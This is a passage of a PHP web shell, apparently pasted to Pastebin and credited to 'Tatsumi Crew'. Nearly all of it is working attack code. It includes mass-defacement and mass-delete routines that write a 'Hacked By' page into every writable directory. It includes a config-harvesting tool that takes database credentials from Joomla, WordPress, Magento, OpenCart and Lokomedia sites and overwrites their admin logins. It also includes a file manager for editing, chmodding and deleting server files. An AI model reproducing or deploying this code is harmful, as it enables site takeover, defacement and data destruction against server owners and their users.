  1514.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  1515.         while($file = readdir($dh)) {
  1516.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  1517.                 if(is_dir($dirrall . "/" . $file)) {
  1518.                     $inner_files = ListFiles($dirrall . "/" . $file);
  1519.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  1520.                 } else {
  1521.                     array_push($files, $dirrall . "/" . $file);
  1522.                 }
  1523.             }
  1524.             }
  1525.  
  1526.             closedir($dh);
  1527.             return $files;
  1528.         }
  1529.     }
  1530.     function gass_all(){
  1531.         global $index ;
  1532.         $dirrall=$_POST['d_dir'];
  1533.         foreach (ListFiles($dirrall) as $key=>$file){
  1534.             $file = str_replace('//',"/",$file);
  1535.             echo "<center><strong>$file</strong> ===>";
  1536.             edit_file($file,$index);
  1537.             flush();
  1538.         }
  1539.         $key = $key+1;
  1540.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  1541.     function sabun_massal($dir,$namafile,$isi_script) {
  1542.         if(is_writable($dir)) {
  1543.             $dira = scandir($dir);
  1544.             foreach($dira as $dirb) {
  1545.                 $dirc = "$dir/$dirb";
  1546.                 $lokasi = $dirc.'/'.$namafile;
  1547.                 if($dirb === '.') {
  1548.                     file_put_contents($lokasi, $isi_script);
  1549.                 } elseif($dirb === '..') {
  1550.                     file_put_contents($lokasi, $isi_script);
  1551.                 } else {
  1552.                     if(is_dir($dirc)) {
  1553.                         if(is_writable($dirc)) {
  1554.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  1555.                             file_put_contents($lokasi, $isi_script);
  1556.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  1557.                         }
  1558.                     }
  1559.                 }
  1560.             }
  1561.         }
  1562.     }
  1563.     if($_POST['mass'] == 'onedir') {
  1564.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  1565.         $ini="http://";
  1566.         $mainpath=$_POST[d_dir];
  1567.         $file=$_POST[d_file];
  1568.         $path=opendir("$mainpath");
  1569.         $code=base64_encode($_POST[script]);
  1570.         $indx=base64_decode($code);
  1571.         while($row=readdir($dir)){
  1572.         $start=@fopen("$row/$file","w+");
  1573.         $finish=@fwrite($start,$indx);
  1574.         if ($finish){
  1575.             echo"$ini$row/$file\n";
  1576.             }
  1577.         }
  1578.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  1579.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  1580.         $path=opendir("$mainpath");
  1581.         $code=base64_encode($_POST[script]);
  1582.         $indx=base64_decode($code);
  1583.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  1584.         $finish=@fwrite($start,$indx);
  1585.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  1586.         }
  1587.  
  1588.     }
  1589.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  1590.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  1591.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  1592.     elseif($_POST['mass'] == 'massdeface') {
  1593.         echo "<div style='margin: 5px auto; padding: 5px'>";
  1594.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1595.         echo "</div>";  }
  1596.     else {
  1597.         echo "
  1598.         <center><font style='text-decoration: underline;'>
  1599.         Select Type:<br>
  1600.         </font>
  1601.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  1602.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  1603.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  1604.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  1605.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  1606.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  1607.         <font style='text-decoration: underline;'>Folder:</font><br>
  1608.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1609.         <font style='text-decoration: underline;'>Filename:</font><br>
  1610.         <input type='text' name='d_file' value='ngeue.php' style='width: 450px;' height='10'><br>
  1611.         <font style='text-decoration: underline;'>Index File:</font><br>
  1612.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By ./Cyber00t</textarea><br>
  1613.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  1614.         </form></center>";
  1615.         }  
  1616. }elseif($_GET['mass'] == 'changer') {
  1617. if($_POST['sikat']) {
  1618.       echo "<center><h1>Config Reset Password</h1>
  1619.     <form method='post'>
  1620.     Link Config: <br>
  1621.     <textarea name='link' style='width: 450px; height:250px;'>";
  1622.     GrabUrl($_POST['linkconfig'],'txt');
  1623.     echo"</textarea><br>
  1624.         User Baru : <input type='text' name='newuser' placeholder='tatsumi'> <br><br>
  1625.         Password Baru : <input type='text' name='newpasswd' placeholder='tatsumi'><br><br>
  1626.     <input type='submit' style='width: 450px;' name='masschanger' value='Hajar!!'>
  1627.     </form></center>";
  1628.   }else {
  1629.     echo '<center>
  1630.     <h1>Config Reset Password</h1>
  1631.     <form method="post">
  1632.     </select><br>
  1633.     Link Config :<br>
  1634.     <input type="text" name="linkconfig" height="10" style="width: 450px;" placeholder="http://jembod.com/tatsumi_symconf/"><br>
  1635.     </br>
  1636.         <input type="submit" style="width: 450px;" name="sikat" value="Change User!!">
  1637.     </form></center>';
  1638.   }
  1639.   if($_POST['masschanger']) {
  1640.     $user = $_POST['newuser'];
  1641.     $pass = $_POST['newpasswd'];
  1642.     $passx = md5($pass);
  1643.     $link = explode("\r\n", $_POST['link']);
  1644.     foreach($link as $file_conf) {
  1645.       $config = file_get_contents($file_conf);
  1646.       if(preg_match("/JConfig|joomla/",$config)) {
  1647.         $dbhost = ambilkata($config,"host = '","'");
  1648.         $dbuser = ambilkata($config,"user = '","'");
  1649.         $dbpass = ambilkata($config,"password = '","'");
  1650.         $dbname = ambilkata($config,"db = '","'");
  1651.         $dbprefix = ambilkata($config,"dbprefix = '","'");
  1652.         $prefix = $dbprefix."users";
  1653.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1654.         $db = mysql_select_db($dbname);
  1655.         $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1656.         $result = mysql_fetch_array($q);
  1657.         $id = $result['id'];
  1658.         $site = ambilkata($config,"sitename = '","'");
  1659.         $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1660.         echo "CMS: Joomla<br>";
  1661.         if($site == '') {
  1662.           echo "Sitename => <font color=red>Error Cok</font><br>";
  1663.         } else {
  1664.           echo "Sitename => $site<br>";
  1665.         }
  1666.         if(!$update OR !$conn OR !$db) {
  1667.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  1668.         } else {
  1669.           echo "[+] username: <font color=lime>$user</font><br>";
  1670.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  1671.         }
  1672.         mysql_close($conn);
  1673.       } elseif(preg_match("/WordPress/",$config)) {
  1674.         $dbhost = ambilkata($config,"DB_HOST', '","'");
  1675.         $dbuser = ambilkata($config,"DB_USER', '","'");
  1676.         $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1677.         $dbname = ambilkata($config,"DB_NAME', '","'");
  1678.         $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1679.         $prefix = $dbprefix."users";
  1680.         $option = $dbprefix."options";
  1681.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1682.         $db = mysql_select_db($dbname);
  1683.         $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1684.         $result = mysql_fetch_array($q);
  1685.         $id = $result[ID];
  1686.         $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1687.         $result2 = mysql_fetch_array($q2);
  1688.         $target = $result2[option_value];
  1689.         if($target == '') {
  1690.           $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1691.         } else {
  1692.           $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1693.         }
  1694.         $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE id='$id'");
  1695.         echo "CMS: Wordpress<br>";
  1696.         echo $url_target;
  1697.         if(!$update OR !$conn OR !$db) {
  1698.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  1699.         } else {
  1700.           echo "[+] username: <font color=lime>$user</font><br>";
  1701.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  1702.         }
  1703.         mysql_close($conn);
  1704.       } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1705.         $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1706.         $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1707.         $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1708.         $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1709.         $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1710.         $prefix = $dbprefix."admin_user";
  1711.         $option = $dbprefix."core_config_data";
  1712.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1713.         $db = mysql_select_db($dbname);
  1714.         $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1715.         $result = mysql_fetch_array($q);
  1716.         $id = $result[user_id];
  1717.         $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1718.         $result2 = mysql_fetch_array($q2);
  1719.         $target = $result2[value];
  1720.         if($target == '') {
  1721.           $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1722.         } else {
  1723.           $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1724.         }
  1725.         $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
  1726.         echo "CMS: Magento<br>";
  1727.         echo $url_target;
  1728.         if(!$update OR !$conn OR !$db) {
  1729.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  1730.         } else {
  1731.           echo "[+] username: <font color=lime>$user</font><br>";
  1732.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  1733.         }
  1734.         mysql_close($conn);
  1735.       } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1736.         $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1737.         $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1738.         $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1739.         $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1740.         $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1741.         $prefix = $dbprefix."user";
  1742.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1743.         $db = mysql_select_db($dbname);
  1744.         $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1745.         $result = mysql_fetch_array($q);
  1746.         $id = $result[user_id];
  1747.         $target = ambilkata($config,"HTTP_SERVER', '","'");
  1748.         if($target == '') {
  1749.           $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1750.         } else {
  1751.           $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1752.         }
  1753.         $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
  1754.         echo "CMS: OpenCart<br>";
  1755.         echo $url_target;
  1756.         if(!$update OR !$conn OR !$db) {
  1757.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  1758.         } else {
  1759.           echo "[+] username: <font color=lime>$user</font><br>";
  1760.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  1761.         }
  1762.         mysql_close($conn);
  1763.       } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1764.         $dbhost = ambilkata($config,'server = "','"');
  1765.         $dbuser = ambilkata($config,'username = "','"');
  1766.         $dbpass = ambilkata($config,'password = "','"');
  1767.         $dbname = ambilkata($config,'database = "','"');
  1768.         $prefix = "users";
  1769.         $option = "identitas";
  1770.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1771.         $db = mysql_select_db($dbname);
  1772.         $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1773.         $result = mysql_fetch_array($q);
  1774.         $target = $result[alamat_website];
  1775.         if($target == '') {
  1776.           $target2 = $result[url];
  1777.           $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1778.           if($target2 == '') {
  1779.             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1780.           } else {
  1781.             $cek_login3 = file_get_contents("$target2/adminweb/");
  1782.             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1783.             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1784.               $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1785.             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1786.               $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1787.             } else {
  1788.               $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1789.             }
  1790.           }
  1791.         } else {
  1792.           $cek_login = file_get_contents("$target/adminweb/");
  1793.           $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1794.           if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1795.             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1796.           } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1797.             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1798.           } else {
  1799.             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1800.           }
  1801.         }
  1802.         $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE level='admin'");
  1803.         echo "CMS: Lokomedia<br>";
  1804.         if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1805.           echo $url_target2;
  1806.         } else {
  1807.           echo $url_target;
  1808.         }
  1809.         if(!$update OR !$conn OR !$db) {
  1810.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  1811.         } else {
  1812.           echo "[+] username: <font color=lime>$user</font><br>";
  1813.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  1814.         }
  1815.         mysql_close($conn);
  1816.       }
  1817.     }
  1818.   }    
  1819. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  1820. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  1821. if($_POST['opt'] == 'chmod'){
  1822. if(isset($_POST['perm'])){
  1823. if(chmod($_POST['path'],$_POST['perm'])){
  1824. echo '<font color="green">Success !</font><br/>';
  1825. }else{
  1826. echo '<font color="red">Denied !</font><br />';
  1827. }
  1828. }
  1829. echo '<form method="POST">
  1830. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  1831. <input type="hidden" name="path" value="'.$_POST['path'].'">
  1832. <input type="hidden" name="opt" value="chmod">
  1833. <input type="submit" value="Go" />
  1834. </form>';
  1835. }
  1836. elseif($_POST['opt'] == 'rename'){
  1837. if(isset($_POST['newname'])){
  1838. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  1839. echo '<font color="green">Success !</font><br/>';
  1840. }else{
  1841. echo '<font color="red">Denied !</font><br />';
  1842. }
  1843. $_POST['name'] = $_POST['newname'];
  1844. }
  1845. echo '<form method="POST">
  1846. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  1847. <input type="hidden" name="path" value="'.$_POST['path'].'">
  1848. <input type="hidden" name="opt" value="rename">
  1849. <input type="submit" value="Go" />
  1850. </form>';
  1851. }elseif($_POST['opt'] == 'edit'){
  1852. if(isset($_POST['src'])){
  1853. $fp = fopen($_POST['path'],'w');
  1854. if(fwrite($fp,$_POST['src'])){
  1855. echo '<font color="green">Success !</font><br/>';
  1856. }else{
  1857. echo '<font color="red">Denied !</font><br/>';
  1858. }
  1859. fclose($fp);
  1860. }
  1861. echo '<form method="POST">
  1862. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  1863. <input type="hidden" name="path" value="'.$_POST['path'].'">
  1864. <input type="hidden" name="opt" value="edit">
  1865. <input type="submit" value="Save" />
  1866. </form>';
  1867. }
  1868. echo '</center>';
  1869. }else{
  1870. echo '</table><br/><center>';
  1871. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  1872. if($_POST['type'] == 'dir'){
  1873. if(rmdir($_POST['path'])){
  1874. echo '<font color="green">Success !</font><br/>';
  1875. }else{
  1876. echo '<font color="red">Denied !                                                                                                             </font><br/>';
  1877. }
  1878. }elseif($_POST['type'] == 'file'){
  1879. if(unlink($_POST['path'])){
  1880. echo '<font color="green">Success</font><br/>';
  1881. }else{
  1882. echo '<font color="red">Denied</font><br/>';
  1883. }
  1884. }
  1885. }
  1886. echo '';
  1887. $scandir = scandir($path);
  1888. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1889.             <tr>
  1890. <tr class="first">
  1891.             <th class="th_home"><center>Name</center></th>
  1892.             <th class="th_home"><center>Size</center></th>
  1893.             <th class="th_home"><center>Permission</center></th>
  1894.             <th class="th_home"><center>Action</center></th>
  1895. </tr>';
  1896.  
  1897. foreach($scandir as $dir){
  1898. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  1899. echo '<tr>
  1900. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  1901. <td><center>--</center></td>
  1902. <td><center>';
  1903. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  1904. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  1905. echo perms($path.'/'.$dir);
  1906. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  1907.  
  1908. echo '</center></td>
  1909. <td><center><form method="POST" action="?option&path='.$path.'">
  1910. <select name="opt">
  1911. <option value="">Select</option>
  1912. <option value="delete">Delete</option>
  1913. <option value="chmod">Chmod</option>
  1914. <option value="rename">Rename</option>
  1915. </select>
  1916. <input type="hidden" name="type" value="dir">
  1917. <input type="hidden" name="name" value="'.$dir.'">
  1918. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  1919. <input type="submit" value=">">
  1920. </form></center></td>
  1921. </tr>';
  1922. }
  1923. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  1924. foreach($scandir as $file){
  1925. if(!is_file($path.'/'.$file)) continue;
  1926. $size = filesize($path.'/'.$file)/1024;
  1927. $size = round($size,3);
  1928. if($size >= 1024){
  1929. $size = round($size/1024,2).' MB';
  1930. }else{
  1931. $size = $size.' KB';
  1932. }
  1933.  
  1934. echo '<tr>
  1935. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  1936. <td><center>'.$size.'</center></td>
  1937. <td><center>';
  1938. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  1939. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  1940. echo perms($path.'/'.$file);
  1941. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  1942. echo '</center></td>
  1943. <td><center><form method="POST" action="?option&path='.$path.'">
  1944. <select name="opt">
  1945. <option value="">Select</option>
  1946. <option value="delete">Delete</option>
  1947. <option value="chmod">Chmod</option>
  1948. <option value="rename">Rename</option>
  1949. <option value="edit">Edit</option>
  1950. </select>
  1951. <input type="hidden" name="type" value="file">
  1952. <input type="hidden" name="name" value="'.$file.'">
  1953. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  1954. <input type="submit" value=">">
  1955. </form></center></td>
  1956. </tr>';
  1957. }
  1958. echo '</table>
  1959. </div>';
  1960. }
  1961. echo '<br><br><hr color="#191919"><br><center><br/>Copyright &copy '.date("Y").' <a href="http://www.tatsumi-crew.net" target="_blank">Tatsumi Crew</a></center>
  1962. </body>
  1963. </html>';
  1964. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top